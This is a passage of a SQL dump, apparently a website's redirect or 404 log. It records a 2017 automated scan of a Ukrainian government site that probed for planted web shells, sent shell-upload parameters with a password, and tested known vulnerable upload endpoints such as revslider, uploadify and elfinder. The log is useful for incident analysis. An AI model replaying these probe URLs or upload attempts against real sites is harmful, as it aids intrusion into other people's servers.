00:00:00',301),(28996,'http://www.malyn-rayrada.gov.ua/jconfig.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:37','0000-00-00 00:00:00',301),(28997,'http://www.malyn-rayrada.gov.ua/media/reads.php?z3=NXRiU2E4LnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:39','0000-00-00 00:00:00',301),(28998,'http://www.malyn-rayrada.gov.ua/media/1ndex.php?z3=NXRiU2E4LnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:41','0000-00-00 00:00:00',301),(28999,'http://www.malyn-rayrada.gov.ua/sql_dump.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:42','0000-00-00 00:00:00',301),(29000,'http://www.malyn-rayrada.gov.ua/images/laj.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:44','0000-00-00 00:00:00',301),(29001,'http://www.malyn-rayrada.gov.ua/media/404.php?z3=NXRiU2E4LnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:49','0000-00-00 00:00:00',301),(29002,'http://www.malyn-rayrada.gov.ua/media/tmp.php?z3=NXRiU2E4LnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:49','0000-00-00 00:00:00',301),(29003,'http://www.malyn-rayrada.gov.ua/r3x.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:51','0000-00-00 00:00:00',301),(29004,'http://www.malyn-rayrada.gov.ua/log.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:53','0000-00-00 00:00:00',301),(29005,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:58','0000-00-00 00:00:00',301),(29006,'http://www.malyn-rayrada.gov.ua/includes/u2p.php?z3=NXRiU2E4LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:58','0000-00-00 00:00:00',301),(29007,'http://www.malyn-rayrada.gov.ua/images/xxx.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:59','0000-00-00 00:00:00',301),(29008,'http://www.malyn-rayrada.gov.ua/al277.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:00','0000-00-00 00:00:00',301),(29009,'http://www.malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=NXRiU2E4LnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:01','0000-00-00 00:00:00',301),(29010,'http://www.malyn-rayrada.gov.ua/install.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:02','0000-00-00 00:00:00',301),(29011,'http://www.malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=NXRiU2E4LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:03','0000-00-00 00:00:00',301),(29012,'http://www.malyn-rayrada.gov.ua/robot.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:04','0000-00-00 00:00:00',301),(29013,'http://www.malyn-rayrada.gov.ua/wsdl.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:05','0000-00-00 00:00:00',301),(29014,'http://www.malyn-rayrada.gov.ua/site/tmp/cTivrC.php?z3=NXRiU2E4LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:06','0000-00-00 00:00:00',301),(29015,'http://www.malyn-rayrada.gov.ua/update.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:07','0000-00-00 00:00:00',301),(29016,'http://www.malyn-rayrada.gov.ua/wp-main.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:10','0000-00-00 00:00:00',301),(29017,'http://www.malyn-rayrada.gov.ua/news.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:12','0000-00-00 00:00:00',301),(29018,'http://www.malyn-rayrada.gov.ua/images/al277.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:13','0000-00-00 00:00:00',301),(29019,'http://www.malyn-rayrada.gov.ua/webconfig.txt.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:15','0000-00-00 00:00:00',301),(29020,'http://www.malyn-rayrada.gov.ua/thumb.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:17','0000-00-00 00:00:00',301),(29021,'http://www.malyn-rayrada.gov.ua/SessionController.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:20','0000-00-00 00:00:00',301),(29022,'http://www.malyn-rayrada.gov.ua/maill.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:21','0000-00-00 00:00:00',301),(29023,'http://www.malyn-rayrada.gov.ua/error-log.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:22','0000-00-00 00:00:00',301),(29024,'http://www.malyn-rayrada.gov.ua/authenticating.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:25','0000-00-00 00:00:00',301),(29025,'http://www.malyn-rayrada.gov.ua/images/google-assist.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:28','0000-00-00 00:00:00',301),(29026,'http://www.malyn-rayrada.gov.ua/images/robots.txt.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:29','0000-00-00 00:00:00',301),(29027,'http://www.malyn-rayrada.gov.ua/elements.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:29','0000-00-00 00:00:00',301),(29028,'http://www.malyn-rayrada.gov.ua/xmlsrpc.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:30','0000-00-00 00:00:00',301),(29029,'http://www.malyn-rayrada.gov.ua/wp-cache.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:31','0000-00-00 00:00:00',301),(29030,'http://www.malyn-rayrada.gov.ua/images/404.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:32','0000-00-00 00:00:00',301),(29031,'http://www.malyn-rayrada.gov.ua/images/head.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:33','0000-00-00 00:00:00',301),(29032,'http://www.malyn-rayrada.gov.ua/cache/support.php?z3=NXRiU2E4LnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:33','0000-00-00 00:00:00',301),(29033,'http://www.malyn-rayrada.gov.ua/RoseLeif.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:34','0000-00-00 00:00:00',301),(29034,'http://www.malyn-rayrada.gov.ua/Abbrevsprl.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:35','0000-00-00 00:00:00',301),(29035,'http://www.malyn-rayrada.gov.ua/show.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:35','0000-00-00 00:00:00',301),(29036,'http://www.malyn-rayrada.gov.ua/images/defau1t.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:37','0000-00-00 00:00:00',301),(29037,'http://www.malyn-rayrada.gov.ua/cli/40dd1d.php?z3=NXRiU2E4LnBocA==&z4=L2NsaS8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:42','0000-00-00 00:00:00',301),(29038,'http://www.malyn-rayrada.gov.ua/infos.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:51','0000-00-00 00:00:00',301),(29039,'http://www.malyn-rayrada.gov.ua/cache/defau1t.php?z3=NXRiU2E4LnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:52','0000-00-00 00:00:00',301),(29040,'http://www.malyn-rayrada.gov.ua/bookmark.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:53','0000-00-00 00:00:00',301),(29041,'http://www.malyn-rayrada.gov.ua/configbak.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:28:57','0000-00-00 00:00:00',301),(29042,'http://www.malyn-rayrada.gov.ua/wp-data.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:02','0000-00-00 00:00:00',301),(29043,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Fbrrchive.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:02','0000-00-00 00:00:00',301),(29044,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/Fbrrchive.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:09','0000-00-00 00:00:00',301),(29045,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:09','0000-00-00 00:00:00',301),(29046,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:10','0000-00-00 00:00:00',301),(29047,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:10','0000-00-00 00:00:00',301),(29048,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:13','0000-00-00 00:00:00',301),(29049,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:14','0000-00-00 00:00:00',301),(29050,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIontrol.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:16','0000-00-00 00:00:00',301),(29051,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIasrgasfontrol.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:17','0000-00-00 00:00:00',301),(29052,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Analyser.php?z3=NXRiU2E4LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:24','0000-00-00 00:00:00',301),(29053,'http://www.malyn-rayrada.gov.ua/cache/list.php?z3=NXRiU2E4LnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:29:25','0000-00-00 00:00:00',301),(29054,'http://www.malyn-rayrada.gov.ua/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:28','0000-00-00 00:00:00',301),(29055,'http://www.malyn-rayrada.gov.ua/m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:29','0000-00-00 00:00:00',301),(29056,'http://www.malyn-rayrada.gov.ua/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:30','0000-00-00 00:00:00',301),(29057,'http://www.malyn-rayrada.gov.ua/tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:31','0000-00-00 00:00:00',301),(29058,'http://www.malyn-rayrada.gov.ua/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:31','0000-00-00 00:00:00',301),(29059,'http://www.malyn-rayrada.gov.ua/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-01-13 13:29:31','0000-00-00 00:00:00',301),(29060,'http://www.malyn-rayrada.gov.ua/nktt.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:31','0000-00-00 00:00:00',301),(29061,'http://www.malyn-rayrada.gov.ua/zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:32','0000-00-00 00:00:00',301),(29062,'http://www.malyn-rayrada.gov.ua/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:32','0000-00-00 00:00:00',301),(29063,'http://www.malyn-rayrada.gov.ua/ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:32','0000-00-00 00:00:00',301),(29064,'http://www.malyn-rayrada.gov.ua/active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:38','0000-00-00 00:00:00',301),(29065,'http://www.malyn-rayrada.gov.ua/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:39','0000-00-00 00:00:00',301),(29066,'http://www.malyn-rayrada.gov.ua/images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:39','0000-00-00 00:00:00',301),(29067,'http://www.malyn-rayrada.gov.ua/images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:39','0000-00-00 00:00:00',301),(29068,'http://www.malyn-rayrada.gov.ua/images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:39','0000-00-00 00:00:00',301),(29069,'http://www.malyn-rayrada.gov.ua/help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',10,0,'2017-01-13 13:29:40','0000-00-00 00:00:00',301),(29070,'http://www.malyn-rayrada.gov.ua/libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:40','0000-00-00 00:00:00',301),(29071,'http://www.malyn-rayrada.gov.ua/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:40','0000-00-00 00:00:00',301),(29072,'http://www.malyn-rayrada.gov.ua/tmp/pz.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:40','0000-00-00 00:00:00',301),(29073,'http://www.malyn-rayrada.gov.ua/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:41','0000-00-00 00:00:00',301),(29074,'http://www.malyn-rayrada.gov.ua/wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:41','0000-00-00 00:00:00',301),(29075,'http://www.malyn-rayrada.gov.ua/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:41','0000-00-00 00:00:00',301),(29076,'http://www.malyn-rayrada.gov.ua/images/stories/xsamxadoo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:41','0000-00-00 00:00:00',301),(29077,'http://www.malyn-rayrada.gov.ua/tmp/petx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:42','0000-00-00 00:00:00',301),(29078,'http://www.malyn-rayrada.gov.ua/tmp/bogel.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:43','0000-00-00 00:00:00',301),(29079,'http://www.malyn-rayrada.gov.ua/images/stories/0d4y.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:43','0000-00-00 00:00:00',301),(29080,'http://www.malyn-rayrada.gov.ua/cache/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:44','0000-00-00 00:00:00',301),(29081,'http://www.malyn-rayrada.gov.ua/images/stories/a.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:45','0000-00-00 00:00:00',301),(29082,'http://www.malyn-rayrada.gov.ua/b1.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:46','0000-00-00 00:00:00',301),(29083,'http://www.malyn-rayrada.gov.ua/mide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:46','0000-00-00 00:00:00',301),(29084,'http://www.malyn-rayrada.gov.ua/wp-content/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:47','0000-00-00 00:00:00',301),(29085,'http://www.malyn-rayrada.gov.ua/images/stories/shell.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:48','0000-00-00 00:00:00',301),(29086,'http://www.malyn-rayrada.gov.ua/images/stories/filemga.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:29:48','0000-00-00 00:00:00',301),(29087,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:48','0000-00-00 00:00:00',301),(29088,'http://www.malyn-rayrada.gov.ua/default_component.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:50','0000-00-00 00:00:00',301),(29089,'http://www.malyn-rayrada.gov.ua/images/w0rm.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:50','0000-00-00 00:00:00',301),(29090,'http://www.malyn-rayrada.gov.ua/images/sym.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:52','0000-00-00 00:00:00',301),(29091,'http://www.malyn-rayrada.gov.ua/images/wp-mail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:53','0000-00-00 00:00:00',301),(29092,'http://www.malyn-rayrada.gov.ua/media/jmail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:54','0000-00-00 00:00:00',301),(29093,'http://www.malyn-rayrada.gov.ua/images/stories/webroot.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:54','0000-00-00 00:00:00',301),(29094,'http://www.malyn-rayrada.gov.ua/images/upa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:57','0000-00-00 00:00:00',301),(29095,'http://www.malyn-rayrada.gov.ua/images/stories/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:57','0000-00-00 00:00:00',301),(29096,'http://www.malyn-rayrada.gov.ua/images/stories/ali.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:58','0000-00-00 00:00:00',301),(29097,'http://www.malyn-rayrada.gov.ua/hh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:58','0000-00-00 00:00:00',301),(29098,'http://www.malyn-rayrada.gov.ua/images/stories/gh.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:58','0000-00-00 00:00:00',301),(29099,'http://www.malyn-rayrada.gov.ua/tmp/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:58','0000-00-00 00:00:00',301),(29100,'http://www.malyn-rayrada.gov.ua/images/upxx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:59','0000-00-00 00:00:00',301),(29101,'http://www.malyn-rayrada.gov.ua/images/stories/gass.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:59','0000-00-00 00:00:00',301),(29102,'http://www.malyn-rayrada.gov.ua/up14.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:30:59','0000-00-00 00:00:00',301),(29103,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/5tbSa8.php',NULL,'','',1,0,'2017-01-13 13:31:00','0000-00-00 00:00:00',301),(29104,'http://www.malyn-rayrada.gov.ua/wp-admin/admin-ajax.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-admin/admin-ajax.php','',13,0,'2017-01-13 13:31:00','0000-00-00 00:00:00',301),(29105,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/5tbSa8.php',NULL,'','',1,0,'2017-01-13 13:31:00','0000-00-00 00:00:00',301),(29106,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/5tbSa8.php',NULL,'','',1,0,'2017-01-13 13:31:01','0000-00-00 00:00:00',301),(29107,'http://www.malyn-rayrada.gov.ua/uploadify/uploadify.php?folder=/',NULL,'http://www.malyn-rayrada.gov.ua/uploadify/uploadify.php?folder=/','',11,0,'2017-01-13 13:31:02','0000-00-00 00:00:00',301),(29108,'http://www.malyn-rayrada.gov.ua/5tbSa8.php',NULL,'','',1,0,'2017-01-13 13:31:02','0000-00-00 00:00:00',301),(29109,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/php/connector.minimal.php',NULL,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/php/connector.minimal.php','',7,0,'2017-01-13 13:31:02','0000-00-00 00:00:00',301),(29110,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/5tbSa8.php',NULL,'','',1,0,'2017-01-13 13:31:03','0000-00-00 00:00:00',301),(29111,'http://www.malyn-rayrada.gov.ua/wp-installation.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:31:03','0000-00-00 00:00:00',301),(29112,'http://www.malyn-rayrada.gov.ua/E.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:31:03','0000-00-00 00:00:00',301),(29113,'http://www.malyn-rayrada.gov.ua/Jijle3.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:31:04','0000-00-00 